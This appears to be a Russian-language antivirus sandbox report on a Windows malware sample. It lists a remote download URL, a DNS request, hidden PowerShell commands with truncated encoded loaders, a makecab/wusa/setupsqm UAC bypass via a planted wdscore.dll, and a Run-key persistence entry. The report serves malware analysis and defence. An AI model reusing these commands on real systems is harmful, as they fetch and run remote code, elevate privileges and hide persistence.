Техническая информация
- http://dm##################wrcjimxnfsrbgravivgbannnpnubawpdvekzbdbuqrd.zzz.com.ua/uac.txt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -windowStyle hidden -Enc cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARAB...
- C:\users\public\libraries\content
- C:\users\public\libraries\reg.bat
- %WINDIR%\temp\cmd.bat
- %TEMP%\wdscore.dll
- %TEMP%\cab_2876_3
- %TEMP%\cab_2876_2
- %TEMP%\cab_2876_4
- %TEMP%\cab_2876_6
- %TEMP%\cab_2876_5
- %TEMP%\uac.cab
- %TEMP%\cab_904_3
- %TEMP%\cab_904_2
- %TEMP%\cab_904_4
- %TEMP%\cab_904_6
- %TEMP%\cab_904_5
- <SYSTEM32>\oobe\$dpx$.tmp\294bf3400fc35548b36ae2deb9046e09.tmp
- %TEMP%\cab_2876_2
- %TEMP%\cab_2876_3
- %TEMP%\cab_2876_4
- %TEMP%\cab_2876_5
- %TEMP%\cab_2876_6
- %TEMP%\cab_904_2
- %TEMP%\cab_904_3
- %TEMP%\cab_904_4
- %TEMP%\cab_904_5
- %TEMP%\cab_904_6
- %TEMP%\uac.cab
- %TEMP%\wdscore.dll
- <SYSTEM32>\oobe\$dpx$.tmp\294bf3400fc35548b36ae2deb9046e09.tmp в <SYSTEM32>\oobe\wdscore.dll
- http://dm##################wrcjimxnfsrbgravivgbannnpnubawpdvekzbdbuqrd.zzz.com.ua/uac.txt
- DNS ASK dm##################wrcjimxnfsrbgravivgbannnpnubawpdvekzbdbuqrd.zzz.com.ua
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -windowStyle hidden -Enc cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARAB...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' " /c powershell -exec Bypass -windowStyle hidden -Enc cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -windowStyle hidden -Enc cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARAB...
- '<SYSTEM32>\makecab.exe' %TEMP%\wdscore.dll %TEMP%\uac.cab
- '<SYSTEM32>\wusa.exe' %TEMP%\uac.cab /extract:<SYSTEM32>\oobe\
- '<SYSTEM32>\oobe\setupsqm.exe'
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\temp\cmd.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowStyle hidden -exec bypass -noexit Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name CheckIN -value powershell -exec bypass -windowStyle hidden -enc cwBhAGw...